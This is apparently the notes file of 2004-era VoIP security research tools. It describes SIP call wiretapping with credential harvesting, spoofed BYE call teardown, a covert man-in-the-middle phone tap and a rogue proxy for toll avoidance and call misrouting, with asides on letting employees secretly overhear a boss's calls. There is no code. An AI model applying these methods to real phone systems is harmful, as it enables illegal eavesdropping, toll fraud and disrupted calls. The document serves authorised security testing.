    Copyright (c)  2004  Mark D. Collier
    Permission is granted to copy, distribute and/or modify this document
    under the terms of the GNU Free Documentation License, Version 1.2
    or any later version published by the Free Software Foundation;
    with no Invariant Sections, no Front-Cover Texts, and no Back-Cover Texts.
    A copy of the license is included in the section entitled "GNU
    Free Documentation License".

Author: Mark D. Collier - 12/01/2006   v1.1
        Mark D. Collier - 04/26/2004   v1.0
        www.securelogix.com - mark.collier@securelogix.com
        www.hackingexposedvoip.com

This tool was produced with honorable intentions, which are:

  o To aid owners of VoIP infrastructure to test, audit, and uncover security
    vulnerabilities in their deployments.

  o To aid 3rd parties to test, audit, and uncover security vulnerabilities
    in the VoIP infrastructure of owners of said infrastructure who contract
    with or otherwise expressly approve said 3rd parties to assess said
    VoIP infrastructure.

  o To aid producers of VoIP infrastructure to test, audit, and uncover security
    vulnerabilities in the VoIP hardware/software/systems they produce.

  o For use in collective educational endeavors or use by individuals for
    their own intellectual curiosity, amusement, or aggrandizement - absent
    nefarious intent.
   
Unlawful use of this tool is strictly prohibited.

                         NOTES ABOUT THE RESEARCH


Call Recording

    Modifying the source code of 'tcpdump', a known network sniffer tool,
    seemed to be the best way to achieve VoIP call recording. However, a
    review of the tcpdump code determined that 'libpcap', the underlying
    packet capturing library, was doing most of the work. So, a new tool,
    named 'capture', was created using just libpcap.

    To limit the scope of the proof-of-concept tool, only UDP based SIP
    calls are recorded. All UDP packets are scanned to determine if they
    appear to be SIP, and further analyzed to discover which ports contain
    the RTP media. All those matching packets are then written to disk,
    with an option to make separate files by call or just one single file
    for all calls.

    The files written are in a standard format that other analysis tools
    can read. One such tool, Ethereal, is used to extract the RTP media
    payload and convert it to an audio file, which can then be replayed out
    the speakers. For each standard call, there are two audio streams, one
    to the caller and one from the caller. For this proof-of-concept, the
    audio streams are not merged for combined playback.

    Additionally, the wiretap tool became the most logical place to gather
    user names, URIs, and authentication data for analysis by other tools.

    The wiretap tool can capture calls completely transparently by
    installing it on ethernet bridge hardware with no configured IP
    presence. In this case, there is no possibility of accidentally packet
    creation and transmission, just packet recording. However, the same
    tool can be installed on an existing system, capturing all calls to and
    from that system. The possibility of detection is greater in this case.

    This 'capture' tool has been developed for Red Hat Linux 9, however it
    should compile on most any Linux variant and easily port to most any
    Unix variant. Creating a Windows version would be more difficult but,
    by using Cygwin and winpcap, it seems quite possible.


Session Tear Down

    As discovered when implementing SecureLogix' other products, tearing
    down unauthenticated SIP calls is trivial. The simplest way to show
    this concept was to add a session tear down option to 'capture', the
    wiretap tool.

    There are several stages where a session can be torn down. The simplest
    to handle is just after a call has been  fully established. In this
    case, enough data has been gathered to send a BYE message to each end
    point, terminating the call.

    A more difficult case, not implemented within the wiretap tool, is to
    terminate calls before they are even established. This can be done by
    sending a CANCEL message to the callee and a BUSY, NOT FOUND, or other
    response to the caller. However, there is a chance that these spoofed
    messages can arrive after real OK and ACK messages, in which case
    CANCEL and BUSY would be ignored. In these cases, the BYE messages
    should be sent as well.

    A last case, also not implemented with the wiretap tool, is to
    terminate calls after a certain period of time. In this case, all
    messages between the two end points must be carefully monitored to keep
    data, such as the CSeq numbers, up to date. When the terminate time
    arrives, the proper BYE messages can then be sent.


Third Party Phone Tap

    To quickly create a proof-of-concept live tap tool, the existing
    SecureLogix' SIP call generator code was modified. The first step was
    to allow the 'sip_rogue' to be the man-in-the-middle. The caller
    calls the sip_rogue which then calls the callee and relays the audio
    data across the two calls. The caller and callee are aware of only
    one call.

    Next, the tool was modified to place a third call to the tap party. The
    audio from the first two calls are mixed and sent to the tap party. So
    as not to give away the presence of the 3rd party listener, no audio
    is accepted from this third call.

    The 'sip_rogue' tool has no audio buffers nor does it even
    decode and reencode the audio stream (except in the case of the tap
    party). It simply relays the last audio packet it received went it is
    time to send. This might cause drop outs, warbling, echo, and other odd
    effects over the course of the call. However, the audio was adequate on
    a fast machine. It was deemed as good enough for our purposes during
    development.

    Another interesting idea with this tool would be to change the third
    party tap to a random person in a call list, such as a list of
    employees. This could be used to make all the calls to the boss
    randomly go to employees as well, allowing them to listen in on
    conversations.


Rogue Proxy

    At first, modifying 'ser' or some other open source SIP proxy software
    seemed to be the best approach to creating a rogue proxy. But, adding
    the proxying capabilities to 'sip_rogue' provided more flexibility in a
    well known code base. Now, we can create proxying end points right along
    side regular user agents and phone tapping relay points.

    After implementing the manual creation of proxy end points, a SIP
    registrar object was added to the 'vttd'. This registrar automatically
    creates new proxy end points as phones register themselves.

    Currently, no authentication or security has been implemented in either
    the registrar or the proxy code. Further development in this area might
    be better served by going back and modifying an existing SIP proxy
    product. The main purpose of this proof-of-concept proxy was to show
    how an existing proxy could be logically replaced (using other tools)
    and therefore allow unauthenticated toll free calling.

    After establishing the basic toll avoidance capabilities, where the
    proxy properly allows all calls to go to their intended destinations,
    an option was added to randomize the destination end points for each
    call. This could be used as a maddening factor, perhaps lowering the
    frequency so that only a small percentage of calls seem to go astray.

